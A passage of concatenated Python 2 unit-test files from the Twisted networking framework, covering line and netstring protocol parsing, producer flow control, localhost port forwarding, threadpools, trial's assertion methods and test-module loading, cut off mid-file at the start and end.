stop_buf = 'twiddle1\ntwiddle2\nstop\nmore\nstuff\n'
stop_output = ['twiddle1', 'twiddle2', 'stop']
def testStopProducing(self):
"""
Test stop inside producing.
"""
for packet_size in range(1, 10):
t = StringIOWithoutClosing()
a = LineTester()
a.makeConnection(protocol.FileWrapper(t))
for i in range(len(self.stop_buf)/packet_size + 1):
s = self.stop_buf[i*packet_size:(i+1)*packet_size]
a.dataReceived(s)
self.failUnlessEqual(self.stop_output, a.received)
def testLineReceiverAsProducer(self):
"""
Test produce/unproduce in receiving.
"""
a = LineTester()
t = StringIOWithoutClosing()
a.makeConnection(protocol.FileWrapper(t))
a.dataReceived('produce\nhello world\nunproduce\ngoodbye\n')
self.assertEquals(a.received,
['produce', 'hello world', 'unproduce', 'goodbye'])
class LineOnlyReceiverTestCase(unittest.TestCase):
"""
Test line only receiveer.
"""
buffer = """foo
bleakness
desolation
plastic forks
"""
def testBuffer(self):
"""
Test buffering over line protocol: data received should match buffer.
"""
t = StringIOWithoutClosing()
a = LineOnlyTester()
a.makeConnection(protocol.FileWrapper(t))
for c in self.buffer:
a.dataReceived(c)
self.failUnlessEqual(a.received, self.buffer.split('\n')[:-1])
def testLineTooLong(self):
"""
Test sending a line too long: it should close the connection.
"""
t = StringIOWithoutClosing()
a = LineOnlyTester()
a.makeConnection(protocol.FileWrapper(t))
res = a.dataReceived('x'*200)
self.assertTrue(isinstance(res, error.ConnectionLost))
class TestMixin:
def connectionMade(self):
self.received = []
def stringReceived(self, s):
self.received.append(s)
MAX_LENGTH = 50
closed = 0
def connectionLost(self, reason):
self.closed = 1
class TestNetstring(TestMixin, basic.NetstringReceiver):
pass
class LPTestCaseMixin:
illegal_strings = []
protocol = None
def getProtocol(self):
t = StringIOWithoutClosing()
a = self.protocol()
a.makeConnection(protocol.FileWrapper(t))
return a
def testIllegal(self):
for s in self.illegal_strings:
r = self.getProtocol()
for c in s:
r.dataReceived(c)
self.assertEquals(r.transport.closed, 1)
class NetstringReceiverTestCase(unittest.TestCase, LPTestCaseMixin):
strings = ['hello', 'world', 'how', 'are', 'you123', ':today', "a"*515]
illegal_strings = [
'9999999999999999999999', 'abc', '4:abcde',
'51:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaab,',]
protocol = TestNetstring
def testBuffer(self):
for packet_size in range(1, 10):
t = StringIOWithoutClosing()
a = TestNetstring()
a.MAX_LENGTH = 699
a.makeConnection(protocol.FileWrapper(t))
for s in self.strings:
a.sendString(s)
out = t.getvalue()
for i in range(len(out)/packet_size + 1):
s = out[i*packet_size:(i+1)*packet_size]
if s:
a.dataReceived(s)
self.assertEquals(a.received, self.strings)
class TestInt32(TestMixin, basic.Int32StringReceiver):
MAX_LENGTH = 50
class Int32TestCase(unittest.TestCase, LPTestCaseMixin):
protocol = TestInt32
strings = ["a", "b" * 16]
illegal_strings = ["\x10\x00\x00\x00aaaaaa"]
partial_strings = ["\x00\x00\x00", "hello there", ""]
def testPartial(self):
for s in self.partial_strings:
r = self.getProtocol()
r.MAX_LENGTH = 99999999
for c in s:
r.dataReceived(c)
self.assertEquals(r.received, [])
def testReceive(self):
r = self.getProtocol()
for s in self.strings:
for c in struct.pack("!i",len(s))+s:
r.dataReceived(c)
self.assertEquals(r.received, self.strings)
class OnlyProducerTransport(object):
# Transport which isn't really a transport, just looks like one to
# someone not looking very hard.
paused = False
disconnecting = False
def __init__(self):
self.data = []
def pauseProducing(self):
self.paused = True
def resumeProducing(self):
self.paused = False
def write(self, bytes):
self.data.append(bytes)
class ConsumingProtocol(basic.LineReceiver):
# Protocol that really, really doesn't want any more bytes.
def lineReceived(self, line):
self.transport.write(line)
self.pauseProducing()
class ProducerTestCase(unittest.TestCase):
def testPauseResume(self):
p = ConsumingProtocol()
t = OnlyProducerTransport()
p.makeConnection(t)
p.dataReceived('hello, ')
self.failIf(t.data)
self.failIf(t.paused)
self.failIf(p.paused)
p.dataReceived('world\r\n')
self.assertEquals(t.data, ['hello, world'])
self.failUnless(t.paused)
self.failUnless(p.paused)
p.resumeProducing()
self.failIf(t.paused)
self.failIf(p.paused)
p.dataReceived('hello\r\nworld\r\n')
self.assertEquals(t.data, ['hello, world', 'hello'])
self.failUnless(t.paused)
self.failUnless(p.paused)
p.resumeProducing()
p.dataReceived('goodbye\r\n')
self.assertEquals(t.data, ['hello, world', 'hello', 'world'])
self.failUnless(t.paused)
self.failUnless(p.paused)
p.resumeProducing()
self.assertEquals(t.data, ['hello, world', 'hello', 'world', 'goodbye'])
self.failUnless(t.paused)
self.failUnless(p.paused)
p.resumeProducing()
self.assertEquals(t.data, ['hello, world', 'hello', 'world', 'goodbye'])
self.failIf(t.paused)
self.failIf(p.paused)
class Portforwarding(unittest.TestCase):
"""
Test port forwarding.
"""
def setUp(self):
self.serverProtocol = wire.Echo()
self.clientProtocol = protocol.Protocol()
self.openPorts = []
def tearDown(self):
try:
self.clientProtocol.transport.loseConnection()
except:
pass
try:
self.serverProtocol.transport.loseConnection()
except:
pass
return defer.gatherResults(
[defer.maybeDeferred(p.stopListening) for p in self.openPorts])
def testPortforward(self):
"""
Test port forwarding through Echo protocol.
"""
realServerFactory = protocol.ServerFactory()
realServerFactory.protocol = lambda: self.serverProtocol
realServerPort = reactor.listenTCP(0, realServerFactory,
interface='127.0.0.1')
self.openPorts.append(realServerPort)
proxyServerFactory = portforward.ProxyFactory('127.0.0.1',
realServerPort.getHost().port)
proxyServerPort = reactor.listenTCP(0, proxyServerFactory,
interface='127.0.0.1')
self.openPorts.append(proxyServerPort)
nBytes = 1000
received = []
d = defer.Deferred()
def testDataReceived(data):
received.extend(data)
if len(received) >= nBytes:
self.assertEquals(''.join(received), 'x' * nBytes)
d.callback(None)
self.clientProtocol.dataReceived = testDataReceived
def testConnectionMade():
self.clientProtocol.transport.write('x' * nBytes)
self.clientProtocol.connectionMade = testConnectionMade
clientFactory = protocol.ClientFactory()
clientFactory.protocol = lambda: self.clientProtocol
reactor.connectTCP(
'127.0.0.1', proxyServerPort.getHost().port, clientFactory)
return d
```
#### File: twisted/test/test_shortcut.py
```python
from twisted.trial import unittest
import os
if os.name == 'nt':
from twisted.python import shortcut
import os.path
import sys
class ShortcutTest(unittest.TestCase):
def testCreate(self):
s1=shortcut.Shortcut("test_shortcut.py")
tempname=self.mktemp() + '.lnk'
s1.save(tempname)
self.assert_(os.path.exists(tempname))
sc=shortcut.open(tempname)
self.assert_(sc.GetPath(0)[0].endswith('test_shortcut.py'))
```
#### File: twisted/test/test_threadpool.py
```python
import pickle, time
from twisted.trial import unittest
from twisted.python import log, threadable
from twisted.internet import reactor, interfaces
#
# See the end of this module for the remainder of the imports.
#
class Synchronization(object):
failures = 0
def __init__(self, N, waiting):
self.N = N
self.waiting = waiting
self.lock = threading.Lock()
self.runs = []
def run(self):
# This is the testy part: this is supposed to be invoked
# serially from multiple threads. If that is actually the
# case, we will never fail to acquire this lock. If it is
# *not* the case, we might get here while someone else is
# holding the lock.
if self.lock.acquire(False):
if not len(self.runs) % 5:
time.sleep(0.0002) # Constant selected based on
# empirical data to maximize the
# chance of a quick failure if this
# code is broken.
self.lock.release()
else:
self.failures += 1
# This is just the only way I can think of to wake up the test
# method. It doesn't actually have anything to do with the
# test.
self.lock.acquire()
self.runs.append(None)
if len(self.runs) == self.N:
self.waiting.release()
self.lock.release()
synchronized = ["run"]
threadable.synchronize(Synchronization)
class ThreadPoolTestCase(unittest.TestCase):
"""Test threadpools."""
def testPersistence(self):
tp = threadpool.ThreadPool(7, 20)
tp.start()
# XXX Sigh - race condition: start should return a Deferred
# which fires when all the workers it started have fully
# started up.
time.sleep(0.1)
self.assertEquals(len(tp.threads), 7)
self.assertEquals(tp.min, 7)
self.assertEquals(tp.max, 20)
# check that unpickled threadpool has same number of threads
s = pickle.dumps(tp)
tp2 = pickle.loads(s)
tp2.start()
# XXX As above
time.sleep(0.1)
self.assertEquals(len(tp2.threads), 7)
self.assertEquals(tp2.min, 7)
self.assertEquals(tp2.max, 20)
tp.stop()
tp2.stop()
def _waitForLock(self, lock):
for i in xrange(1000000):
if lock.acquire(False):
break
time.sleep(1e-5)
else:
self.fail("A long time passed without succeeding")
def _threadpoolTest(self, method):
# This is a schizophrenic test: it seems to be trying to test
# both the dispatch() behavior of the ThreadPool as well as
# the serialization behavior of threadable.synchronize(). It
# would probably make more sense as two much simpler tests.
N = 10
tp = threadpool.ThreadPool()
tp.start()
try:
waiting = threading.Lock()
waiting.acquire()
actor = Synchronization(N, waiting)
for i in xrange(N):
tp.dispatch(actor, actor.run)
self._waitForLock(waiting)
self.failIf(actor.failures, "run() re-entered %d times" % (actor.failures,))
finally:
tp.stop()
def testDispatch(self):
return self._threadpoolTest(lambda tp, actor: tp.dispatch(actor, actor.run))
def testCallInThread(self):
return self._threadpoolTest(lambda tp, actor: tp.callInThread(actor.run))
def testExistingWork(self):
waiter = threading.Lock()
waiter.acquire()
tp = threadpool.ThreadPool(0, 1)
tp.callInThread(waiter.release) # before start()
tp.start()
try:
self._waitForLock(waiter)
finally:
tp.stop()
class RaceConditionTestCase(unittest.TestCase):
def setUp(self):
self.event = threading.Event()
self.threadpool = threadpool.ThreadPool(0, 10)
self.threadpool.start()
def tearDown(self):
del self.event
self.threadpool.stop()
del self.threadpool
def testRace(self):
self.threadpool.callInThread(self.event.set)
self.event.wait()
self.event.clear()
for i in range(3):
self.threadpool.callInThread(self.event.wait)
self.threadpool.callInThread(self.event.set)
self.event.wait(timeout=2)
if not self.event.isSet():
self.event.set()
raise RuntimeError, "test failed"
def testSingleThread(self):
# Ensure no threads running
self.assertEquals(self.threadpool.workers, 0)
for i in range(10):
self.threadpool.callInThread(self.event.set)
self.event.wait()
self.event.clear()
# Ensure there are very few threads running
self.failUnless(self.threadpool.workers <= 2)
if interfaces.IReactorThreads(reactor, None) is None:
for cls in ThreadPoolTestCase, RaceConditionTestCase:
setattr(cls, 'skip', "No thread support, nothing to test here")
else:
import threading
from twisted.python import threadpool
```
#### File: twisted/test/time_helpers.py
```python
class Clock(object):
rightNow = 0.0
def __call__(self):
return self.rightNow
def install(self):
# Violation is fun.
from twisted.internet import base, task
from twisted.python import runtime
self.base_original = base.seconds
self.task_original = task.seconds
self.runtime_original = runtime.seconds
base.seconds = self
task.seconds = self
runtime.seconds = self
def uninstall(self):
from twisted.internet import base, task
from twisted.python import runtime
base.seconds = self.base_original
runtime.seconds = self.runtime_original
task.seconds = self.task_original
def adjust(self, amount):
self.rightNow += amount
def pump(self, reactor, timings):
timings = list(timings)
timings.reverse()
self.adjust(timings.pop())
while timings:
self.adjust(timings.pop())
reactor.iterate()
reactor.iterate()
```
#### File: twisted/trial/itrial.py
```python
import zope.interface as zi
class ITestCase(zi.Interface):
"""DEPRECATED in Twisted 2.5. This interface will be removed in the next
release. Implementing it has no impact.
"""
def setUp():
"""I am run before each method is run"""
def tearDown():
"""I am run after each method is run"""
class IReporter(zi.Interface):
"""I report results from a run of a test suite.
In all lists below, 'Results' are either a twisted.python.failure.Failure
object, or a string.
"""
stream = zi.Attribute("@ivar stream: the io-stream that this reporter will write to")
tbformat = zi.Attribute("@ivar tbformat: either 'default', 'brief', or 'verbose'")
args = zi.Attribute("@ivar args: additional string argument passed from the command line")
shouldStop = zi.Attribute("@ivar shouldStop: a boolean indicating that"
" this reporter would like the test run to stop.")
def startTest(method):
"""report the beginning of a run of a single test method
@param method: an object that is adaptable to ITestMethod
"""
def stopTest(method):
"""report the status of a single test method
@param method: an object that is adaptable to ITestMethod
"""
def startSuite(name):
"""suites which wish to appear in reporter output should call this
before running their tests"""
def endSuite(name):
"""called at the end of a suite, if and only if that suite has called
'startSuite'
"""
def cleanupErrors(errs):
"""called when the reactor has been left in a 'dirty' state
@param errs: a list of L{twisted.python.failure.Failure}s
"""
def upDownError(userMeth, warn=True, printStatus=True):
"""called when an error occurs in a setUp* or tearDown* method
@param warn: indicates whether or not the reporter should emit a
warning about the error
@type warn: Boolean
@param printStatus: indicates whether or not the reporter should
print the name of the method and the status
message appropriate for the type of error
@type printStatus: Boolean
"""
def addSuccess(test):
"""Record that test passed."""
```
#### File: trial/test/test_assertions.py
```python
import StringIO
from twisted.python import reflect, failure
from twisted.python.util import dsu
from twisted.internet import defer
from twisted.trial import unittest, runner, reporter
class MockEquality(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "MockEquality(%s)" % (self.name,)
def __eq__(self, other):
if not hasattr(other, 'name'):
raise ValueError("%r not comparable to %r" % (other, self))
return self.name[0] == other.name[0]
class TestAssertions(unittest.TestCase):
"""Tests for TestCase's assertion methods. That is, failUnless*,
failIf*, assert*.
This is pretty paranoid. Still, a certain paranoia is healthy if you
are testing a unit testing framework.
"""
class FailingTest(unittest.TestCase):
def test_fails(self):
raise self.failureException()
def testFail(self):
try:
self.fail("failed")
except self.failureException, e:
if not str(e) == 'failed':
raise self.failureException("Exception had msg %s instead of %s"
% str(e), 'failed')
else:
raise self.failureException("Call to self.fail() didn't fail test")
def test_failingException_fails(self):
test = runner.TestLoader().loadClass(TestAssertions.FailingTest)
io = StringIO.StringIO()
result = reporter.TestResult()
test.run(result)
self.failIf(result.wasSuccessful())
self.failUnlessEqual(result.errors, [])
self.failUnlessEqual(len(result.failures), 1)
def test_failIf(self):
for notTrue in [0, 0.0, False, None, (), []]:
self.failIf(notTrue, "failed on %r" % (notTrue,))
for true in [1, True, 'cat', [1,2], (3,4)]:
try:
self.failIf(true, "failed on %r" % (true,))
except self.failureException, e:
self.failUnlessEqual(str(e), "failed on %r" % (true,))
else:
self.fail("Call to failIf(%r) didn't fail" % (true,))
def test_failUnless(self):
for notTrue in [0, 0.0, False, None, (), []]:
try:
self.failUnless(notTrue, "failed on %r" % (notTrue,))
except self.failureException, e:
self.failUnlessEqual(str(e), "failed on %r" % (notTrue,))
else:
self.fail("Call to failUnless(%r) didn't fail" % (notTrue,))
for true in [1, True, 'cat', [1,2], (3,4)]:
self.failUnless(true, "failed on %r" % (true,))
def _testEqualPair(self, first, second):
x = self.failUnlessEqual(first, second)
if x != first:
self.fail("failUnlessEqual should return first parameter")
def _testUnequalPair(self, first, second):
try:
self.failUnlessEqual(first, second)
except self.failureException, e:
expected = '%r != %r' % (first, second)
if str(e) != expected:
self.fail("Expected: %r; Got: %s" % (expected, str(e)))
else:
self.fail("Call to failUnlessEqual(%r, %r) didn't fail"
% (first, second))
def test_failUnlessEqual_basic(self):
self._testEqualPair('cat', 'cat')
self._testUnequalPair('cat', 'dog')
self._testEqualPair([1], [1])
self._testUnequalPair([1], 'orange')
def test_failUnlessEqual_custom(self):
x = MockEquality('first')
y = MockEquality('second')
z = MockEquality('fecund')
self._testEqualPair(x, x)
self._testEqualPair(x, z)
self._testUnequalPair(x, y)
self._testUnequalPair(y, z)
def test_failUnlessEqual_incomparable(self):
apple = MockEquality('apple')
orange = ['orange']
try:
self.failUnlessEqual(apple, orange)
except self.failureException:
self.fail("Fail raised when ValueError ought to have been raised.")
except ValueError:
# good. error not swallowed
pass
else:
self.fail("Comparing %r and %r should have raised an exception"
% (apple, orange))
def _raiseError(self, error):
raise error
def test_failUnlessRaises_expected(self):
x = self.failUnlessRaises(ValueError, self._raiseError, ValueError)
self.failUnless(isinstance(x, ValueError),
"Expect failUnlessRaises to return instance of raised "
"exception.")
def test_failUnlessRaises_unexpected(self):
try:
self.failUnlessRaises(ValueError, self._raiseError, TypeError)
except TypeError:
self.fail("failUnlessRaises shouldn't re-raise unexpected "
"exceptions")
except self.failureException, e:
# what we expect
pass
else:
self.fail("Expected exception wasn't raised. Should have failed")
def test_failUnlessRaises_noException(self):
try:
self.failUnlessRaises(ValueError, lambda : None)
except self.failureException, e:
self.failUnlessEqual(str(e),
'ValueError not raised (None returned)')
else:
self.fail("Exception not raised. Should have failed")
def test_failUnlessRaises_failureException(self):
x = self.failUnlessRaises(self.failureException, self._raiseError,
self.failureException)
self.failUnless(isinstance(x, self.failureException),
"Expected %r instance to be returned"
% (self.failureException,))
try:
x = self.failUnlessRaises(self.failureException, self._raiseError,
ValueError)
except self.failureException, e:
# what we expect
pass
else:
self.fail("Should have raised exception")
def test_failIfEqual_basic(self):
x, y, z = [1], [2], [1]
ret = self.failIfEqual(x, y)
self.failUnlessEqual(ret, x,
"failIfEqual should return first parameter")
self.failUnlessRaises(self.failureException,
self.failIfEqual, x, x)
self.failUnlessRaises(self.failureException,
self.failIfEqual, x, z)
def test_failIfEqual_customEq(self):
x = MockEquality('first')
y = MockEquality('second')
z = MockEquality('fecund')
ret = self.failIfEqual(x, y)
self.failUnlessEqual(ret, x,
"failIfEqual should return first parameter")
self.failUnlessRaises(self.failureException,
self.failIfEqual, x, x)
# test when __ne__ is not defined
self.failIfEqual(x, z, "__ne__ not defined, so not equal")
def test_failUnlessIdentical(self):
x, y, z = [1], [1], [2]
ret = self.failUnlessIdentical(x, x)
self.failUnlessEqual(ret, x,
'failUnlessIdentical should return first '
'parameter')
self.failUnlessRaises(self.failureException,
self.failUnlessIdentical, x, y)
self.failUnlessRaises(self.failureException,
self.failUnlessIdentical, x, z)
def test_failUnlessApproximates(self):
x, y, z = 1.0, 1.1, 1.2
self.failUnlessApproximates(x, x, 0.2)
ret = self.failUnlessApproximates(x, y, 0.2)
self.failUnlessEqual(ret, x, "failUnlessApproximates should return "
"first parameter")
self.failUnlessRaises(self.failureException,
self.failUnlessApproximates, x, z, 0.1)
self.failUnlessRaises(self.failureException,
self.failUnlessApproximates, x, y, 0.1)
def test_failUnlessAlmostEqual(self):
precision = 5
x = 8.000001
y = 8.00001
z = 8.000002
self.failUnlessAlmostEqual(x, x, precision)
ret = self.failUnlessAlmostEqual(x, z, precision)
self.failUnlessEqual(ret, x, "failUnlessAlmostEqual should return "
"first parameter (%r, %r)" % (ret, x))
self.failUnlessRaises(self.failureException,
self.failUnlessAlmostEqual, x, y, precision)
def test_failIfAlmostEqual(self):
precision = 5
x = 8.000001
y = 8.00001
z = 8.000002
ret = self.failIfAlmostEqual(x, y, precision)
self.failUnlessEqual(ret, x, "failIfAlmostEqual should return "
"first parameter (%r, %r)" % (ret, x))
self.failUnlessRaises(self.failureException,
self.failIfAlmostEqual, x, x, precision)
self.failUnlessRaises(self.failureException,
self.failIfAlmostEqual, x, z, precision)
def test_failUnlessSubstring(self):
x = "cat"
y = "the dog sat"
z = "the cat sat"
self.failUnlessSubstring(x, x)
ret = self.failUnlessSubstring(x, z)
self.failUnlessEqual(ret, x, 'should return first parameter')
self.failUnlessRaises(self.failureException,
self.failUnlessSubstring, x, y)
self.failUnlessRaises(self.failureException,
self.failUnlessSubstring, z, x)
def test_failIfSubstring(self):
x = "cat"
y = "the dog sat"
z = "the cat sat"
self.failIfSubstring(z, x)
ret = self.failIfSubstring(x, y)
self.failUnlessEqual(ret, x, 'should return first parameter')
self.failUnlessRaises(self.failureException,
self.failIfSubstring, x, x)
self.failUnlessRaises(self.failureException,
self.failIfSubstring, x, z)
def test_assertFailure(self):
d = defer.maybeDeferred(lambda: 1/0)
return self.assertFailure(d, ZeroDivisionError)
def test_assertFailure_wrongException(self):
d = defer.maybeDeferred(lambda: 1/0)
self.assertFailure(d, OverflowError)
d.addCallbacks(lambda x: self.fail('Should have failed'),
lambda x: x.trap(self.failureException))
return d
def test_assertFailure_noException(self):
d = defer.succeed(None)
self.assertFailure(d, ZeroDivisionError)
d.addCallbacks(lambda x: self.fail('Should have failed'),
lambda x: x.trap(self.failureException))
return d
def test_assertFailure_moreInfo(self):
"""In the case of assertFailure failing, check that we get lots of
information about the exception that was raised.
"""
try:
1/0
except ZeroDivisionError:
f = failure.Failure()
d = defer.fail(f)
d = self.assertFailure(d, RuntimeError)
d.addErrback(self._checkInfo, f)
return d
def _checkInfo(self, assertionFailure, f):
assert assertionFailure.check(self.failureException)
output = assertionFailure.getErrorMessage()
self.assertIn(f.getErrorMessage(), output)
self.assertIn(f.getBriefTraceback(), output)
def test_assertFailure_masked(self):
"""A single wrong assertFailure should fail the whole test.
"""
class ExampleFailure(Exception):
pass
class TC(unittest.TestCase):
failureException = ExampleFailure
def test_assertFailure(self):
d = defer.maybeDeferred(lambda: 1/0)
self.assertFailure(d, OverflowError)
self.assertFailure(d, ZeroDivisionError)
return d
test = TC('test_assertFailure')
result = reporter.TestResult()
test.run(result)
self.assertEqual(1, len(result.failures))
class TestAssertionNames(unittest.TestCase):
"""Tests for consistency of naming within TestCase assertion methods
"""
def _getAsserts(self):
dct = {}
reflect.accumulateMethods(self, dct, 'assert')
return [ dct[k] for k in dct if not k.startswith('Not') and k != '_' ]
def _name(self, x):
return x.__name__
def test_failUnless_matches_assert(self):
asserts = self._getAsserts()
failUnlesses = reflect.prefixedMethods(self, 'failUnless')
self.failUnlessEqual(dsu(asserts, self._name),
dsu(failUnlesses, self._name))
def test_failIf_matches_assertNot(self):
asserts = reflect.prefixedMethods(unittest.TestCase, 'assertNot')
failIfs = reflect.prefixedMethods(unittest.TestCase, 'failIf')
self.failUnlessEqual(dsu(asserts, self._name),
dsu(failIfs, self._name))
def test_equalSpelling(self):
for name, value in vars(self).items():
if not callable(value):
continue
if name.endswith('Equal'):
self.failUnless(hasattr(self, name+'s'),
"%s but no %ss" % (name, name))
self.failUnlessEqual(value, getattr(self, name+'s'))
if name.endswith('Equals'):
self.failUnless(hasattr(self, name[:-1]),
"%s but no %s" % (name, name[:-1]))
self.failUnlessEqual(value, getattr(self, name[:-1]))
```
#### File: trial/test/test_script.py
```python
import StringIO, sys, sets
from twisted.trial import unittest, runner
from twisted.scripts import trial
from twisted.python import util
from twisted.trial.test.test_loader import testNames
def sibpath(filename):
"""For finding files in twisted/trial/test"""
return util.sibpath(__file__, filename)
class TestGarbageCollect(unittest.TestCase):
def setUp(self):
self.config = trial.Options()
def test_forcedGc(self):
"""
Passing the '--force-gc' option to the trial script should set the
appropriate flag in the test loader.
"""
self.config['force-gc'] = True
loader = trial._getLoader(self.config)
self.assertEqual(True, loader.forceGarbageCollection)
def test_unforcedGc(self):
"""
The test loader should only enable forced garbage collection if the
option is passed to the trial script.
"""
loader = trial._getLoader(self.config)
self.assertEqual(False, loader.forceGarbageCollection)
class TestModuleTest(unittest.TestCase):
def setUp(self):
self.config = trial.Options()
def tearDown(self):
self.config = None
def test_testNames(self):
"""
Check that the testNames helper method accurately collects the
names of tests in suite.
"""
self.assertEqual(testNames(self), [self.id()])
def assertSuitesEqual(self, test1, names):
loader = runner.TestLoader()
names1 = testNames(test1)
names2 = testNames(runner.TestSuite(map(loader.loadByName, names)))
names1.sort()
names2.sort()
self.assertEqual(names1, names2)
def test_baseState(self):
self.failUnlessEqual(0, len(self.config['tests']))
def test_testmoduleOnModule(self):
"""
Check that --testmodule loads a suite which contains the tests
referred to in test-case-name inside its parameter.
"""
self.config.opt_testmodule(sibpath('moduletest.py'))
self.assertSuitesEqual(trial._getSuite(self.config),
['twisted.trial.test.test_test_visitor'])
def test_testmoduleTwice(self):
"""
When the same module is specified with two --testmodule flags, it
should only appear once in the suite.
"""
self.config.opt_testmodule(sibpath('moduletest.py'))
self.config.opt_testmodule(sibpath('moduletest.py'))
self.assertSuitesEqual(trial._getSuite(self.config),
['twisted.trial.test.test_test_visitor'])
def test_testmoduleOnSourceAndTarget(self):
"""
If --testmodule is specified twice, once for module A and once for
a module which refers to module A, then make sure module A is only
added once.
"""
self.config.opt_testmodule(sibpath('moduletest.py'))
self.config.opt_testmodule(sibpath('test_test_visitor.py'))
self.assertSuitesEqual(trial._getSuite(self.config),
['twisted.trial.test.test_test_visitor'])
def test_testmoduleOnSelfModule(self):
"""
When given a module that refers to *itself* in the test-case-name
variable, check that --testmodule only adds the tests once.
"""
self.config.opt_testmodule(sibpath('moduleself.py'))
self.assertSuitesEqual(trial._getSuite(self.config),
['twisted.trial.test.moduleself'])
def test_testmoduleOnScript(self):
"""
Check that --testmodule loads tests referred to in test-case-name
buffer variables.
"""
self.config.opt_testmodule(sibpath('scripttest.py'))
self.assertSuitesEqual(trial._getSuite(self.config),
['twisted.trial.test.test_test_visitor',
'twisted.trial.test.test_class'])
def test_testmoduleOnNonexistentFile(self):
"""
Check that --testmodule displays a meaningful error message when
passed a non-existent filename.
"""
buffy = StringIO.StringIO()
stderr, sys.stderr = sys.stderr, buffy
filename = 'test_thisbetternoteverexist.py'
try:
self.config.opt_testmodule(filename)
self.failUnlessEqual(0, len(self.config['tests']))
self.failUnlessEqual("File %r doesn't exist\n" % (filename,),
buffy.getvalue())
finally:
sys.stderr = stderr
def test_testmoduleOnEmptyVars(self):
"""
Check that --testmodule adds no tests to the suite for modules
which lack test-case-name buffer variables.
"""
self.config.opt_testmodule(sibpath('novars.py'))
self.failUnlessEqual(0, len(self.config['tests']))
def test_testmoduleOnModuleName(self):
"""
Check that --testmodule does *not* support module names as arguments
and that it displays a meaningful error message.
"""
buffy = StringIO.StringIO()
stderr, sys.stderr = sys.stderr, buffy
moduleName = 'twisted.trial.test.test_script'
try:
self.config.opt_testmodule(moduleName)
self.failUnlessEqual(0, len(self.config['tests']))
self.failUnlessEqual("File %r doesn't exist\n" % (moduleName,),
buffy.getvalue())
finally:
sys.stderr = stderr
def test_parseLocalVariable(self):
declaration = '-*- test-case-name: twisted.trial.test.test_tests -*-'
localVars = trial._parseLocalVariables(declaration)
self.failUnlessEqual({'test-case-name':
'twisted.trial.test.test_tests'},
localVars)
def test_trailingSemicolon(self):
declaration = '-*- test-case-name: twisted.trial.test.test_tests; -*-'
localVars = trial._parseLocalVariables(declaration)
self.failUnlessEqual({'test-case-name':
'twisted.trial.test.test_tests'},
localVars)
def test_parseLocalVariables(self):
declaration = ('-*- test-case-name: twisted.trial.test.test_tests; '
'foo: bar -*-')
localVars = trial._parseLocalVariables(declaration)
self.failUnlessEqual({'test-case-name':
'twisted.trial.test.test_tests',
'foo': 'bar'},
localVars)
def test_surroundingGuff(self):
declaration = ('## -*- test-case-name: '
'twisted.trial.test.test_tests -*- #')
localVars = trial._parseLocalVariables(declaration)
self.failUnlessEqual({'test-case-name':
'twisted.trial.test.test_tests'},
localVars)
def test_invalidLine(self):
self.failUnlessRaises(ValueError, trial._parseLocalVariables,
'foo')
def test_invalidDeclaration(self):
self.failUnlessRaises(ValueError, trial._parseLocalVariables,
'-*- foo -*-')
self.failUnlessRaises(ValueError, trial._parseLocalVariables,
'-*- foo: bar; qux -*-')
self.failUnlessRaises(ValueError, trial._parseLocalVariables,
'-*- foo: bar: baz; qux: qax -*-')
def test_variablesFromFile(self):
localVars = trial.loadLocalVariables(sibpath('moduletest.py'))
self.failUnlessEqual({'test-case-name':
'twisted.trial.test.test_test_visitor'},
localVars)
def test_noVariablesInFile(self):
localVars = trial.loadLocalVariables(sibpath('novars.py'))
self.failUnlessEqual({}, localVars)
def test_variablesFromScript(self):
localVars = trial.loadLocalVariables(sibpath('scripttest.py'))
self.failUnlessEqual(
{'test-case-name': ('twisted.trial.test.test_test_visitor,'
'twisted.trial.test.test_class')},
localVars)
def test_getTestModules(self):
modules = trial.getTestModules(sibpath('moduletest.py'))
self.failUnlessEqual(modules, ['twisted.trial.test.test_test_visitor'])
def test_getTestModules_noVars(self):
modules = trial.getTestModules(sibpath('novars.py'))
self.failUnlessEqual(len(modules), 0)
def test_getTestModules_multiple(self):
modules = trial.getTestModules(sibpath('scripttest.py'))
self.failUnlessEqual(sets.Set(modules),
sets.Set(['twisted.trial.test.test_test_visitor',
'twisted.trial.test.test_class']))
def test_looksLikeTestModule(self):
for filename in ['test_script.py', 'twisted/trial/test/test_script.py']:
self.failUnless(trial.isTestFile(filename),
"%r should be a test file" % (filename,))
for filename in ['twisted/trial/test/moduletest.py',
sibpath('scripttest.py'), sibpath('test_foo.bat')]:
self.failIf(trial.isTestFile(filename),
"%r should *not* be a test file" % (filename,))
```
#### File: trial/test/test_test_visitor.py
```python
from twisted.trial import unittest
from twisted.trial.runner import TestSuite, suiteVisit
pyunit = __import__('unittest')
class MockVisitor(object):
def __init__(self):
self.calls = []
def __call__(self, testCase):
self.calls.append(testCase)
class TestTestVisitor(unittest.TestCase):
def setUp(self):
self.visitor = MockVisitor()
def test_visitCase(self):
"""
Test that C{visit} works for a single test case.
"""
testCase = TestTestVisitor('test_visitCase')
testCase.visit(self.visitor)
self.assertEqual(self.visitor.calls, [testCase])
def test_visitSuite(self):
"""
Test that C{visit} hits all tests in a suite.
"""
tests = [TestTestVisitor('test_visitCase'),
TestTestVisitor('test_visitSuite')]
testSuite = TestSuite(tests)
testSuite.visit(self.visitor)
self.assertEqual(self.visitor.calls, tests)
def test_visitEmptySuite(self):
"""
Test that C{visit} on an empty suite hits nothing.
"""
TestSuite().visit(self.visitor)
self.assertEqual(self.visitor.calls, [])
def test_visitNestedSuite(self):
"""
Test that C{visit} recurses through suites.
"""
tests = [TestTestVisitor('test_visitCase'),
TestTestVisitor('test_visitSuite')]
testSuite = TestSuite([TestSuite([test]) for test in tests])
testSuite.visit(self.visitor)
self.assertEqual(self.visitor.calls, tests)
def test_visitPyunitSuite(self):
"""
Test that C{suiteVisit} visits stdlib unittest suites
"""
test = TestTestVisitor('test_visitPyunitSuite')
suite = pyunit.TestSuite([test])
suiteVisit(suite, self.visitor)
self.assertEqual(self.visitor.calls, [test])
def test_visitPyunitCase(self):
"""
Test that a stdlib test case in a suite gets visited.
"""
class PyunitCase(pyunit.TestCase):
def test_foo(self):
pass
test = PyunitCase('test_foo')
TestSuite([test]).visit(self.visitor)
self.assertEqual(self.visitor.calls, [test])
```
#### File: web/test/test_domhelpers.py
```python
from twisted.trial.unittest import TestCase
from twisted.web import microdom
from twisted.web import domhelpers
class DomHelpersTest(TestCase):
def test_getElementsByTagName(self):
doc1=microdom.parseString('<foo/>')
